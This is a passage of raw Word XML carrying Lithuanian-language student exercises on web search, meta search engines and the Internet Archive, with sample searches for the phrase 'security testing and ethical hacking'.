      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dar</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nesin</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aud</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ojote</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Rekomenduojamas tinklalapis paieškai </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.searchenginewatch.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ite </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nuorodas </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir glaustai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jas aprašykite</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D610DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>apibūdin</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCE2FD" w14:textId="7A8C9567" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="000D73E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internete s</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">uraskite penkias meta paieškos paslaugas (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00102558" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">meta search engines). </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateik</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">jų </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nuorodas </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>glaustai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aprašykite</w:t>
      </w:r>
      <w:r w:rsidR="00D610DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> apibūdin</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652174AF" w14:textId="3CF88E6F"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Pasirinkite du paieškos variklius ir</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> į juos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įveskite frazę</w:t>
      </w:r>
      <w:r w:rsidR="00102558" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>security testing and ethical hacking</w:t>
      </w:r>
      <w:r w:rsidR="00102558" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (su kabutėmis)</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. I</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rašykite tris dažniausi</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ai pateikiamus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">atsakymus. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4533A7" w14:textId="26CAF21E"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Atlikite tokią pat paiešką</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tik</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> frazę</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102558" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>security testing and ethical hacking</w:t>
      </w:r>
      <w:r w:rsidR="00102558" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> rašykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>be kabučių</w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šrašykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tris dažniausi</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ai pateik</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iamus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">atsakymus. </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Palyginkite juos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>su tais, kuriuos gavote atlikdami 6 užduotį.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Savo </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pastebėjimus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009859B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>glaustai p</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>akomentuokite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8BCDB" w14:textId="1AAC0D62" w:rsidR="0098110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Atlikite tokią pat paiešką</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įvesdami frazę</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>security testing and ethical hacking</w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (su kabutėmis ir be kabučių) </w:t>
      </w:r>
      <w:r w:rsidR="000D73E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>naudo</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>damiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dviem meta paieškos varikliais. Ar</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gauti atsakymai</w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rezultatai skiriasi nuo ankstesnių paieškų?</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Savo pastebėjimus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>glaustai pakomentuokite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CCCD7" w14:textId="0A42A24B" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00CF235F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Interneto archyve s</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">uraskite seniausią Mozilla </w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">interneto </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>svetainę. Nor</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėdami atlikti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">šią </w:t>
      </w:r>
      <w:r w:rsidR="00E307AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>užduotį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D51349" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">interneto </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">svetainėje </w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
          </w:rPr>
          <w:t>http://www.archive.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>suveskite</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId86">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
          </w:rPr>
          <w:t>www.mozilla.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateikite at</w:t>
      </w:r>
      <w:r w:rsidR="00835BFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vertos</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> svetainės ekrano vaizdą</w:t>
      </w:r>
      <w:r w:rsidR="00F837B3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55ADC3" w14:textId="233972F8"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Naudodami paiešką ir interneto archyvus raskite ir parsisiųskite</w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00835BFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>diegti</w:t>
      </w:r>
      <w:r w:rsidR="00AA1663" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nereikia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
